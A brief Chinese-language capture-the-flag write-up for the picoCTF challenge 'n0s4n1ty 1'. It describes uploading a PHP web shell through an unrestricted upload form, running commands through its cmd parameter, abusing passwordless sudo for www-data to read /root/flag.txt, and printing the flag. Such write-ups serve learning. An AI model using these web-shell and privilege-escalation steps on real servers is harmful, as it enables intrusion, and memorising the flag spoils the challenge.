n0s4n1ty 1#

一進到網站會發現可以上傳檔案，開F12還會發現上傳沒有限制檔案類型

先建立shell.php

(本來想直接貼上來的，但是 windows 會一直幫我刪掉，真是謝囉)

然後把 shell.php 上傳上去

進到 /uploads/shell.php?cmd=ls /root 之後會發現 /root 底下沒有顯示任何檔案

檢查一下 /uploads/shell.php?cmd=id

1
uid=33(www-data) gid=33(www-data) groups=33(www-data)

會發現使用者 www-data 可以不需要密碼以 sudo 執行任何指令（權限等於 root）

重新加上 sudo 檢查 /root

/uploads/shell.php?cmd=sudo cat /root/flag.txt

1
picoCTF{wh47_c4n_u_d0_wPHP_712a9451}